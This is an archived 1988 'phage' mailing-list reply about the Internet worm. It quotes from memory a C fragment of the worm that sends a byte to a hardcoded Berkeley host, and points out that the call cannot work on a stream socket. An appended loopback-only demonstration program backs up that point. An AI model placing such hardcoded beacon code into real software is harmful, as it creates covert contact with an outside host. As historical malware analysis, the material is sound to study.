The 'Security Digest' Archives (TM)

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #129 [Re: ernie.berkeley.edu] (1 message, 623 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/129.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: Chris Torek <chris@mimsy.umd.edu>
To: phage
Date: Mon 19:06:52 07/11/1988 EST
Subject: Re: ernie.berkeley.edu

	From: Eric S. Johnson <esj@manatee.cis.ufl.edu>

	... Why is the internet address of ernie.berkeley.edu
	hardcoded into the virus?

No one knows.

	Someone on risks list said the virus was sending back status
	reports to ernie, but I can't imagine why it would do it.

That may have been the intent; the code, however, looked more or less
like

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s >= 0) {
	sin.sin_family = AF_INET;
	sin.sin_addr = inet_addr("128.32.134.16");	/* or .137.13 */
	sin.sin_port = ?;	/* I will not go verify this code; sorry */
	sendto(s, "", 1, 0, &sin, sizeof(sin));
	(void) close(s);
    }

But sendto() does not work on stream sockets!

Chris

END OF DOCUMENT
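
The point made at the end of the message can be checked on a present-day POSIX system with the following added example (not part of the original message and not the worm's code): it issues the same one-byte sendto() on a never-connected SOCK_STREAM socket and, for contrast, on a SOCK_DGRAM socket. The loopback address and port 9 are constructed stand-ins chosen here; the stream call is expected to fail with ENOTCONN (EPIPE on Linux) without any packet being sent.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL 0		/* not defined on every BSD-derived system */
#endif

/*
 * Call sendto() once on a fresh, never-connected socket of the given type.
 * Returns 0 if the kernel accepted the byte, otherwise the errno value.
 */
int try_sendto(int type)
{
    struct sockaddr_in sin;
    int s, err = 0;

    s = socket(AF_INET, type, 0);
    if (s < 0)
	return errno;
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);	/* constructed target */
    sin.sin_port = htons(9);				/* constructed port */
    /* MSG_NOSIGNAL: report the failure as errno instead of raising SIGPIPE */
    if (sendto(s, "", 1, MSG_NOSIGNAL,
	       (struct sockaddr *)&sin, sizeof(sin)) < 0)
	err = errno;
    (void) close(s);
    return err;
}

int main(void)
{
    int e;

    e = try_sendto(SOCK_STREAM);	/* no connect() was ever done */
    printf("SOCK_STREAM sendto: %s\n", e ? strerror(e) : "sent");
    e = try_sendto(SOCK_DGRAM);		/* datagram sockets need no connection */
    printf("SOCK_DGRAM  sendto: %s\n", e ? strerror(e) : "sent");
    return 0;
}
```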